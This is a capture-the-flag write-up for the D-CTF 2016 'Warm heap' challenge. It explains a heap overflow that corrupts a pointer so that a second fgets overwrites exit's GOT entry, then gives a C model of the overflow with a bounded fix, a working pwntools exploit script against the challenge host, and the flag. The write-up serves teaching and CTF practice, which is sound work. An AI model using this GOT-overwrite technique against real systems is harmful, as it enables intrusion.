D-CTF Quals 2016: Warm heap (Exploit 100)

2016-10-04

Description

10.13.37.21:1337
https://dctf.def.camp/quals-2016/exp100.bin

Exploit

[Figure warm_heap_1.png: heap layout of the four malloc'd chunks]

The binary mallocs four chunks, laid out as in the figure above. The first and third chunks each hold a pointer, to the second and fourth chunks respectively. The program then calls fgets twice, once through each of those pointers. The first fgets reads more bytes than the second chunk can hold, so the overflow lets us overwrite the pointer stored in the third chunk and thereby choose the destination of the second fgets. Pointing that destination at the GOT entry of exit and writing the address of the embedded print-flag function makes the program print the flag when it calls exit.
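To make the overflow concrete, here is an added C model of the layout described above; it is not code from the challenge binary or from the original write-up. It assumes a flat byte array in place of the real heap, with the 40 bytes of padding the payload uses folded into a single 40-byte buffer (in the real binary part of that span is chunk metadata, which the page does not detail), and it leaves out glibc chunk headers. The first read is performed with the real fgets twice: once with an oversized length, as the binary does, and once with the buffer's own size, which is the fix. All sizes and offsets are assumptions for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the four-chunk layout (assumed sizes: the write-up gives none).
 * A flat byte array stands in for the heap so the result does not depend
 * on the allocator; glibc chunk headers are omitted, only adjacency matters.
 *   A: pointer to B      B: 40-byte buffer (first fgets destination)
 *   C: pointer to D      D: 40-byte buffer (second fgets destination) */
enum { BUF_LEN = 40, OFF_A = 0, OFF_B = 8, OFF_C = 48, OFF_D = 56, ARENA_LEN = 96 };

static unsigned char arena[ARENA_LEN];

/* Constructed input line: 40 bytes of padding, the same amount the exploit
 * uses, then 8 'B's where the payload would carry an 8-byte address. */
static const char demo_line[] =
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB\n";

static void put_ptr(unsigned char *at, void *p) { memcpy(at, &p, sizeof p); }
static void *get_ptr(const unsigned char *at) { void *p; memcpy(&p, at, sizeof p); return p; }

/* Lay the arena out as the binary does: A -> B, C -> D. */
static void setup_arena(void)
{
    memset(arena, 0, sizeof arena);
    put_ptr(arena + OFF_A, arena + OFF_B);
    put_ptr(arena + OFF_C, arena + OFF_D);
}

/* Feed the constructed line through a temporary file so that the real
 * fgets is used, as in the binary. */
static FILE *demo_stream(void)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fputs(demo_line, f);
    rewind(f);
    return f;
}

/* Run the program's first fgets into the buffer that chunk A points to,
 * with `size` as the fgets length argument. Returns 1 if chunk C's pointer
 * still points at chunk D afterwards, 0 if the read ran past B and
 * overwrote it, -1 if the temporary stream could not be created. */
int demo_pointer_intact(int size)
{
    setup_arena();
    FILE *in = demo_stream();
    if (in == NULL)
        return -1;
    char *dst = get_ptr(arena + OFF_A);
    fgets(dst, size, in);   /* the bug: size is not bounded by BUF_LEN */
    fclose(in);
    return get_ptr(arena + OFF_C) == (void *)(arena + OFF_D);
}

/* The raw 8 bytes currently stored in chunk C, so a corrupted value is visible. */
unsigned long long demo_chunk_c_value(void)
{
    unsigned long long v;
    memcpy(&v, arena + OFF_C, sizeof v);
    return v;
}

int main(void)
{
    int bad = demo_pointer_intact(64);          /* oversized length, as in the binary */
    unsigned long long bad_c = demo_chunk_c_value();
    int good = demo_pointer_intact(BUF_LEN);    /* length tied to the allocation */
    unsigned long long good_c = demo_chunk_c_value();
    printf("fgets(dst, 64):      pointer intact = %d, chunk C holds 0x%llx\n", bad, bad_c);
    printf("fgets(dst, BUF_LEN): pointer intact = %d, chunk C holds 0x%llx\n", good, good_c);
    return 0;
}
```

With the oversized length the 8 bytes after the padding land exactly on chunk C's pointer (here visibly 0x4242424242424242), which is why the real payload can steer the second fgets wherever it likes; with the length tied to the allocation the read stops inside B and C is untouched.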

warm_heap_exp.py

from pwn import *

# Addresses taken from the challenge binary (not position independent)
exit_got = 0x601068   # GOT entry of exit()
flag = 0x400826       # embedded print-flag function

r = remote('10.13.37.21', 1337)

# First fgets: overflow the second chunk so that the pointer held by the
# third chunk now points at exit's GOT entry.
r.sendline(b'A' * 40 + p64(exit_got))
# Second fgets: writes through the corrupted pointer, replacing exit's GOT
# entry with the print-flag function, so exit() prints the flag.
r.sendline(p64(flag))
print(r.recvall().decode(errors='replace'))

Flag: DCTF{b94c21ff7531cba35a498cb074918b3e}